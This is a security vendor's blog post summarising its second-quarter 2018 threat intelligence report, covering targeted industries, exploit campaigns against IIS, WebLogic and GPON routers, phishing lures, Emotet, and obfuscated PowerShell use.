The Second Quarter Threat Intelligence report offers an expansive overview of the threat landscape for Q2 2018. The content and analysis for this report is built off of intelligence gathered from 2,000+ proprietary network and host-based detection sensors. This blog post is presented to highlight some of the most interesting and important findings; to learn more, you can read the full report.
Key Findings List
- Top three affected industries: biotechnology, accounting and real estate
- IIS and WebLogic exploit attempts remain high from Q1
- Frequently targeted technologies: IIS, Drupal, WebLogic servers, and GPON routers
- Top execution techniques: PowerShell and VBA Scripting
- Use of obfuscated PowerShell commands increased 50%
During Q2, the eSentire SOC alerted clients on approximately 57,000 malicious events. By checking industries against a normalized count of sensors it is possible to see which industries are affected most frequently. In the second quarter of 2018, biotechnology and accounting services were by far the two most alerted on industries out of the 22 client industries monitored by eSentire.
A variety of exploit campaigns were discovered and monitored over the Q2 period. By grouping the attacking IP addresses according to the unique set of exploits over a time period, it is possible to correlate campaigns. The most notable campaigns targeted WebLogic and IIS, IIS and GPON Routers. An interesting aspect of these campaigns is that in many of the cases the attacking infrastructure appears to be compromised servers. The compromised infrastructure was likely affected by the same attacks that it is now being used to conduct attacks. It is unlikely that these campaigns were targeted. Rather, threat actors are using the exploits that they believe will have the highest success rate and launching a high number of opportunistic attacks.
Phishing and Malware Trends
Phishing continues to be a popular and widely employed attack method due to its simplicity and success rate. The most successful lures employed in phishing are Office 365 and DocuSign, although the total attempts using these lures decreased. UPS, eFax and FedEx lures all increased over the period, but saw little success. As the holiday season approaches users should anticipate an increase of shipping themed phishing emails, as threat actors attempt to capitalize on the increase in online shopping.
There were over 30 unique identified malware types reported on through Q2. The most common identified malware for this time period was Emotet. Emotet’s malware authors appear to have adapted the malware’s capability as a banking trojan to a generalized dropper, used to download additional payloads after infection. The high amount of Emotet related cases is not unexpected due to the continued modification and improvement of the malware.
By analyzing endpoint data, an analyst is able to learn significantly more about an attack than would otherwise be possible. Endpoint data from Q2 shows that PowerShell is the most used technique detected on endpoints, making up over 30% of total attack techniques. Endpoint solutions facilitate observation of execution, evasion, and persistence tactics. Of the detected malicious PowerShell use, 83% of attacks employed obfuscation methods meant to hide the activity.
Tracking trends allows for a comprehensive view of the current threat landscape. This enables both an understanding of evolving threats and more focused threat protection. The findings reported in this post are highlights from the Second Quarter Threat Intelligence report. For more findings, visuals and deeper analysis see the full report.